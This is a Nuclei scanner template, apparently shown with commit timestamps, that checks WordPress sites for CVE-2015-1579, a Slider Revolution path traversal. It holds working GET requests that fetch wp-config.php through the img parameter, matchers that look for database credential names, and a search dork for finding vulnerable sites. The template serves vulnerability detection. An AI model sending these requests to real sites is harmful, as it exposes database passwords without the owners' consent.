2022-08-06 16:54:58 +00:00
id : CVE-2015-1579
2022-04-22 10:38:41 +00:00
2022-07-29 14:04:23 +00:00
info :
2022-08-06 16:54:58 +00:00
name : WordPress Slider Revolution - Local File Disclosure
2022-07-29 14:04:23 +00:00
author : pussycat0x
2023-07-11 19:49:27 +00:00
severity : medium
2022-08-10 07:57:48 +00:00
description : |
Directory traversal vulnerability in the Elegant Themes Divi theme for WordPress allows remote attackers to read arbitrary files via a .. (dot dot) in the img parameter in a revslider_show_image action to wp-admin/admin-ajax.php. NOTE : this vulnerability may be a duplicate of CVE-2014-9734.
2023-09-06 13:22:34 +00:00
remediation : |
Update the WordPress Slider Revolution plugin to the latest version to fix the vulnerability.
2022-07-29 14:04:23 +00:00
reference :
- https://blog.sucuri.net/2014/09/slider-revolution-plugin-critical-vulnerability-being-exploited.html
- https://cxsecurity.com/issue/WLB-2021090129
2022-08-06 16:54:58 +00:00
- https://wpscan.com/vulnerability/4b077805-5dc0-4172-970e-cc3d67964f80
2022-08-10 07:57:48 +00:00
- https://nvd.nist.gov/vuln/detail/CVE-2015-1579
2023-07-11 19:49:27 +00:00
- https://wpvulndb.com/vulnerabilities/7540
2022-07-29 14:04:23 +00:00
classification :
2023-07-11 19:49:27 +00:00
cvss-metrics : CVSS:2.0/AV:N/AC:L/Au:N/C:P/I:N/A:N
cvss-score : 5
2022-08-06 16:54:58 +00:00
cve-id : CVE-2015-1579
2022-08-25 08:56:24 +00:00
cwe-id : CWE-22
2023-07-11 19:49:27 +00:00
epss-score : 0.92959
2023-11-01 14:45:21 +00:00
epss-percentile : 0.98754
2023-09-06 13:22:34 +00:00
cpe : cpe:2.3:a:elegant_themes:divi:-:*:*:*:*:wordpress:*:*
2022-07-29 14:04:23 +00:00
metadata :
2023-04-28 08:11:21 +00:00
max-request : 2
2023-07-11 19:49:27 +00:00
vendor : elegant_themes
product : divi
2023-09-06 13:22:34 +00:00
framework : wordpress
google-query : inurl:/wp-content/plugins/revslider
2022-08-27 04:41:18 +00:00
tags : wordpress,wp-plugin,lfi,revslider,wp,wpscan,cve,cve2015
2022-04-22 10:38:41 +00:00
2023-04-27 04:28:59 +00:00
http :
2022-07-29 14:04:23 +00:00
- method : GET
path :
- '{{BaseURL}}/wp-admin/admin-ajax.php?action=revslider_show_image&img=../wp-config.php'
- '{{BaseURL}}/blog/wp-admin/admin-ajax.php?action=revslider_show_image&img=../wp-config.php'
2022-08-10 07:57:48 +00:00
stop-at-first-match : true
2023-07-11 19:49:27 +00:00
2022-07-29 14:04:23 +00:00
matchers-condition : and
matchers :
- type : word
part : body
words :
- "'DB_NAME'"
- "'DB_PASSWORD'"
- "'DB_USER'"
condition : and
- type : status
status :
- 200
2023-11-01 14:45:21 +00:00
# digest: 4a0a004730450220272f17aacbcda2a9f93caac16e457f56e1d8850a4d90b0cc6f4bf405de1823bb022100f521173987b55650d2fde4a9cbab295cd0e028d6c5de95b093b032cabbbc6823:922c64590222798bb761d5b6d8e72950